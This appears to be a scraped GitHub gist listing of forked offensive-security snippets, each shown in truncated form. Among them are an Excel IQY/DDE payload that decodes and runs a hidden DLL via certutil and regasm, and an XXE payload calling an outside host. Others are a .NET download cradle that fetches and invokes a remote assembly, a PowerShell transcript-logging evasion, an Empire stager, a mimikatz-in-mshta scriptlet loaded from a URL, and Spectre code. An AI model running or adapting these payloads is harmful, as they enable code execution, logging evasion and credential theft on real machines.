0x4243
0x4243
/ poc.iqy
Created
September 8, 2018 10:29
— forked from Mr-Un1k0d3r/poc.iqy
IQY File + Embedded DLL POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| WEB | |
| 1 | |
| https://ringzer0team.com/IQY | |
| Selection=EntirePage | |
| Formatting=RTF | |
| PreFormattedTextToColumns=True | |
| ConsecutiveDelimitersAsOne=True | |
| SingleBlockTextImport=False | |
| DisableDateRecognition=False |
0x4243
/ remote.iqy
Created
September 8, 2018 10:26
— forked from Mr-Un1k0d3r/remote.iqy
IQY File Remote Payload POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =cmd|' /c more +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
0x4243
/ clr_via_native.c
Created
July 26, 2018 21:51
— forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
0x4243
/ XXE_payloads
Created
July 24, 2018 15:29
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
0x4243
/ posh.cs
Created
July 19, 2018 06:13
— forked from benpturner/posh.cs
No Powershell with Transcript Logging Evasion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| namespace TranscriptBypass | |
| { | |
| // Compiling with CSC.exe v4.0.30319 or v3.5 | |
| // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll | |
| // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll |
0x4243
/ wmic_starfighters.py
Created
July 19, 2018 04:33
— forked from infosecn1nja/wmic_starfighters.py
Empire stagers module to generates a squiblytwo and starfighters launcher.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lib.common import helpers | |
| class Stager: | |
| def __init__(self, mainMenu, params=[]): | |
| self.info = { | |
| 'Name': 'wmic_xsl_starfighters', | |
| 'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'], |
0x4243
/ DotnetAssemblyDownloadCradle.cs
Created
June 21, 2018 20:57
— forked from cobbr/DotnetAssemblyDownloadCradle.cs
A download cradle for .NET assemblies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
0x4243
/ mimikatz.sct
Created
March 17, 2018 12:55
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
0x4243
/ kmskeys10.txt
Created
March 12, 2018 10:51
— forked from CHEF-KOCH/kmskeys10.txt
Windows 10 KMS Keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows.10.and.Office.2016.gVLK | |
| ##################################################################### | |
| # Install/Uninstall keys # | |
| ##################################################################### | |
| 1.) Uninstall the current product by entering the “uninstall product key” extension: | |
| slmgr.vbs /upk | |
| 2.) Install the key that you obtained above for “Windows Srv 2012R2 DataCtr/Std KMS for Windows 10” |
0x4243
/ spectre.c
Created
January 10, 2018 08:17
— forked from ErikAugust/spectre.c
Spectre example code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |